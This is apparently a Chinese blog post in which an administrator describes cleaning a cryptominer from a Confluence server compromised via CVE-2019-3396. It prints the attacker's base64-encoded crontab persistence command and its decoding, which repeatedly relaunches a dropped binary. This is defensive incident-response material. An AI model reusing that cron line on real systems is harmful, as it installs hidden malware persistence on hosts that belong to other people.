最近遇到一台confluence wiki主机被挖矿,收到CPU 告警异常之后,登录查看,进行分析。
top c 命令查看,果然CPU 已经资源已经被吃完了。。
看到用户是confluence,100%的肯定是confluence的RCE漏洞导致的,因为大部门的使用这个软件的都是破解版本,官方的补丁都是针对付费用户的。
具体漏洞细节:
https://github.com/jas502n/CVE-2019-3396
漏洞利用RCE:
处理过程:
1. 先封掉外网HTTP 端口,后续业务走VPN 通道访问
2. 查杀进程
3. 查杀完成之后,发现进程一直在启动
想到是否已经写了计划任务
crontab -l
cat /etc/crontab
都没有先关信息,最后想到应该没提权到root
crontab -l -u confluence 查到了相关的恶意计划任务,
通过root cd /var/spool/cron/confluence
:> confluence 清空防止差生新的进程
* * * * * echo -n "KCB3aGlsZSA6IDsgZG8gc2xlZXAgNSA7IGlmICEga2lsbCAtMCAyNzMxNiA+L2Rldi9udWxsIDI+JjEgOyB0aGVuIC9vcHQvYXRsYXNzaWFuL2NvbmZsdWVuY2UvdGVtcC9ya3dwcm4gOyBmaSA7IGRvbmUgKSAmIHBpZD0kISA7IChzbGVlcCAyNSAmJiBraWxsIC05ICRwaWQpICY=" | base64 -d | sh >/dev/null 2>&1
base64 解密为:
( while : ; do sleep 5 ; if ! kill -0 27316 >/dev/null 2>&1 ; then rkwprn ; fi ; done ) & pid=$! ; (sleep 25 && kill -9 $pid) &
我的神,死循环怪不得CPU 那么高。。。
cd /opt/atlassian/confluence/temp/
删除相关恶意二进制文件,然后重启 confluence 进程,观察了5分钟左右,发现未未产生新的恶意进程。
这些文件可能都有异常.文件的时间跟故障时间,基本一致,阐述即可
再次扫描,系统正常。
4. 针对Linux的恶意二进制文件进行在线分析
微步在线可以查杀出来:
奇虎360竟然没有报毒。。。。。
还是去权威的:https://www.virustotal.com
识别出是恶意的Linux二进制程序
从刚才产生的缓存文件看,应该是集挖矿,DDoS 为一体的一个木马文件,因为看到了.ntp的隐藏目录,哈哈,别问我为什么知道
关于分析Linux的恶意二进制文件,本人太蔡!!!